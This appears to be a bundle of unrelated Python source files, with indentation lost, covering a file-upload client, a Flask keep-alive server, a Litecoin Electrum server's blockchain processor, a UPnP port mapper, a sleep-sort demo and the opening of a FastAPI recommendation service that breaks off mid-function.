self._last_byte_offset = 0
if self._name is None:
self._name = "unnamed file"
res = cast(UploadResponse, self._client._request_json(
METHOD_FILE, "/upload", {
"inputId": self._input_id,
"chunkByteOffset": self._last_byte_offset,
"type": "input",
"name": self._name,
}, capture_err=True, files={
"file": chunk_content,
}))
self._input_id = res["inputId"]
self._name = res["name"]
self._path = res["path"]
self._ext = res["extension"]
self._last_byte_offset = res["lastByteOffset"]
self._size = res["size"]
self._progress = res["progress"]
return res["exists"]
def upload_full(
self,
file_content: IO[bytes],
file_name: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout) -> int:
if file_name is not None:
self._name = file_name
total_size: Optional[int] = None
if progress_bar is not None:
if hasattr(file_content, "seek"):
init_pos = file_content.seek(0, io.SEEK_CUR)
total_size = file_content.seek(0, io.SEEK_END) - init_pos
file_content.seek(init_pos, io.SEEK_SET)
end = ":"
else:
end = "."
if file_name is None:
msg = f"Uploading unnamed file{end}\n"
else:
msg = f"Uploading file {file_name}{end}\n"
progress_bar.write(msg)
print_progress = get_progress_bar(out=progress_bar)
cur_size = 0
while True:
if total_size is not None:
print_progress(cur_size / total_size, False)
buff = file_content.read(get_file_upload_chunk_size())
if not buff:
break
cur_size += len(buff)
if self.upload_partial(BytesIO(buff)):
break
if total_size is not None:
print_progress(cur_size / total_size, True)
return cur_size
def __repr__(self) -> str:
name = ""
if self._name is not None:
name = f" ({self._name})"
return f"{type(self).__name__}: {self._input_id}{name}"
def __str__(self) -> str:
return repr(self)
# *** InputHandle ***
def create_legacy_client(
url: str,
user: Optional[str] = None,
password: Optional[str] = None,
token: Optional[str] = None) -> XYMELegacyClient:
return XYMELegacyClient(url, user, password, token)
@contextlib.contextmanager
def create_legacy_session(
url: str,
user: Optional[str] = None,
password: Optional[str] = None,
token: Optional[str] = None) -> Iterator[XYMELegacyClient]:
client = None
try:
client = XYMELegacyClient(url, user, password, token)
yield client
finally:
if client is not None:
client.logout()
|
keep_alive.py
|
#------------------------------------------------------------------------#
#---------------------- TO keep the bot running ------------------------#
#------------------------------------------------------------------------#
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return"Hello, I am alive!"
def main():
return "Your Bot Is Ready"
def run():
app.run(host="0.0.0.0", port=8000)
def keep_alive():
server = Thread(target=run)
server.start()
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, Hash, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.bitcoind_url = 'http://%s:%s@%s:%s/' % (
config.get('bitcoind', 'bitcoind_user'),
config.get('bitcoind', 'bitcoind_password'),
config.get('bitcoind', 'bitcoind_host'),
config.get('bitcoind', 'bitcoind_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("litecoind is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 300000)\
or self.storage.height >= 1000000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.bitcoind_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_bitcoind(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def bitcoind(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach litecoind...")
self.wait_on_bitcoind()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("litecoind still warming up...")
self.wait_on_bitcoind()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
return rev_hex(Hash(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80)
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
self.headers_data = self.headers_data[:-40]
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
# store them on disk; store the current chunk in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.bitcoind('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
v = 0
with self.mempool_lock:
for txid, delta in self.mempool_hist.get(addr, ()):
v += delta
return v
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.bitcoind_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
# see if we can get if from cache. if not, add request to queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.bitcoind('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
except BaseException, e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Litecoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.bitcoind('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.bitcoind('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
def get_block(self, block_hash):
block = self.bitcoind('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
logger.error("litecoind error (getfullblock)")
self.wait_on_bitcoind()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run litecoind with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_bitcoind()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
info = self.bitcoind('getinfo')
self.relayfee = info.get('relayfee')
self.bitcoind_height = info.get('blocks')
bitcoind_block_hash = self.bitcoind('getblockhash', (self.bitcoind_height,))
if self.storage.last_hash == bitcoind_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.bitcoind('getblockhash', (self.storage.height + 1,))
except BaseException, e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.bitcoind('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
self.mempool_unconfirmed[tx_hash] = set()
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
self.mempool_unconfirmed[tx_hash].add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "taco", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run taco, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
sleep_sort.py
|
import time
import threading
# 你需要排序的序列(可以包含负数)
num = [-5, 3, 9, 11, -1, 3, 12, 0, 8, -3, 23, 5, 19]
# 睡眠的方法
def doSleep(func):
co = 0.02 # 添加系数让睡眠时间短一些
time.sleep(co * pow(1.1, float(func))) # 使用幂函数就不怕负数排序了
print(func)
# 将多个线程存在一个数组中
thread_list = []
for i in range(len(num)):
temp = threading.Thread(target=doSleep, args=(str(num[i]), ))
thread_list.append(temp)
if __name__ == '__main__':
start = time.clock()
for t in thread_list:
t.start() # 开启线程
for t in thread_list:
t.join() # 所有子线程都结束了主线程才关闭
end = time.clock()
print('用时:', str(end - start))
|
server.py
|
import logging
import math
import os
from threading import Thread
from typing import List
from urllib.request import Request
import json
import boto3
import redis
import cache
import time
import requests
import uvicorn as uvicorn
from fastapi import FastAPI, Header, HTTPException
from fastapi.exceptions import RequestValidationError
from pydantic.main import BaseModel
from starlette.responses import JSONResponse
import datetime
app = FastAPI()
personalize_runtime = boto3.client('personalize-runtime', 'ap-northeast-1')
ps_config = {}
ps_result = "ps-result"
sleep_interval = 10 #second
MANDATORY_ENV_VARS = {
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'RETRIEVE_HOST': 'retrieve',
'RETRIEVE_PORT': '5600',
'FILTER_HOST': 'filter',
'FILTER_PORT': '5200',
'TEST': 'False',
'AWS_REGION': 'ap-northeast-1',
'S3_BUCKET': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
'S3_PREFIX': 'sample-data',
'METHOD': 'customer'
}
class RSHTTPException(HTTPException):
def __init__(self, status_code: int, message: str):
super().__init__(status_code, message)
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target = f, args = args, kwargs = kwargs)
thr.start()
return wrapper
@app.exception_handler(HTTPException)
async def rs_exception_handler(request: Request, rs_exec: HTTPException):
return JSONResponse(
status_code=rs_exec.status_code,
content={
"message": rs_exec.detail
}
)
@app.exception_handler(RequestValidationError)
async def validation_exception_handler(request, exc):
return JSONResponse(
status_code=405,
content={
"message": str(exc)
}
)
def get_data_request(url, get_data_func=None):
logging.info("GET request from :" + url)
if MANDATORY_ENV_VARS['TEST'] == 'True':
return [
{
"id": "1111",
"tag": "coldstart test",
"type": "1"
},
{
"id": "1112",
"tag": "coldstart test",
"type": "1"
}
]
r = requests.get(url)
logging.info("get response status_code:{}".format(r.status_code))
if r.status_code == 200:
logging.info(r.json())
if get_data_func is not None:
return get_data_func(r.json())
else:
return r.json()['data']
else:
if len(r.text) > 100:
logging.error(r.text[100:300])
else:
logging.error(r.text)
raise RSHTTPException(status_code=r.status_code, message="error GET request {}".format(url))
class Metadata(BaseModel):
type: str
class RSItem(BaseModel):
id: str
tags: List[str]
description: str
class Pagination(BaseModel):
curPage: int
pageSize: int
totalSize: int
totalPage: int
class RecommendList(BaseModel):
version: int = 1
metadata: Metadata
content: List[RSItem]
pagination: Pagination
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request...')
return {'result': 'ping'}
@app.get('/api/v1/retrieve/{user_id}', response_model=RecommendList, tags=["retrieve"])
def retrieve_get_v2(user_id: str, curPage: int = 0, pageSize: int = 20, regionId=Header("0"),
recommendType: str = 'recommend'):
logging.info("retrieve_get_v2() enter")
if recommendType == "recommend" and MANDATORY_ENV_VARS['METHOD'] == "ps-complete":
item_list = get_recommend_from_personalize(user_id)
else:
item_list = get_recommend_from_default(user_id, recommendType)
it_list = [RSItem(id=str(it['id']), description=str(it['description']), tags=str(it["tag"]).split(" ")) for it in
item_list]
it_list_paged = it_list[curPage * pageSize: (curPage + 1) * pageSize]
total_page = math.ceil(len(it_list) / pageSize)
content = it_list_paged
pagination = Pagination(curPage=curPage, pageSize=pageSize,
totalSize=len(it_list),
totalPage=total_page)
rs_list = RecommendList(
metadata=Metadata(type="RecommendList"),
content=content,
pagination=pagination
)
logging.info("rs_list: {}".format(rs_list))
print("---------time finish retrieve:")
print(datetime.datetime.now())
return rs_list
# ## only for news
# @app.get('/api/v1/retrieve/{user_id}', response_model=RecommendList, tags=["retrieve"])
# def retrieve_get_v1(user_id: str, curPage: int = 0, pageSize: int = 20, regionId=Header("0")):
# logging.info("retrieve_get_v1() enter")
# host = MANDATORY_ENV_VARS['FILTER_HOST']
# port = MANDATORY_ENV_VARS['FILTER_PORT']
# content_dict = {}
# pagenation_dict = {}
#
# sub_types = ["recommend"]
#
# for type in sub_types:
# svc_url = "http://{}:{}/filter/get_recommend_data?userId={}&recommendType={}" \
# .format(host, port, user_id, type)
#
# logging.info("svc_url:{}".format(svc_url))
# item_list = get_data_request(svc_url, lambda json_data: json_data['data'])
#
# it_list = [RSItem(id=str(it['id']), tags=str(it["tag"]).split(" ")) for it in item_list]
# it_list_paged = it_list[curPage * pageSize: (curPage + 1) * pageSize]
# total_page = math.ceil(len(it_list) / pageSize)
#
# content_dict[type] = it_list_paged
# pagenation_dict[type] = Pagination(curPage=curPage, pageSize=pageSize,
# totalSize=len(it_list),
# totalPage=total_page)
#
# rs_list = RecommendList(
# metadata=Metadata(type="RecommendList", subtype=sub_types),
# content=content_dict,
# pagination=pagenation_dict
# )
#
# logging.info("rs_list: {}".format(rs_list))
# return rs_list
def get_recommend_from_default(user_id, recommend_type):
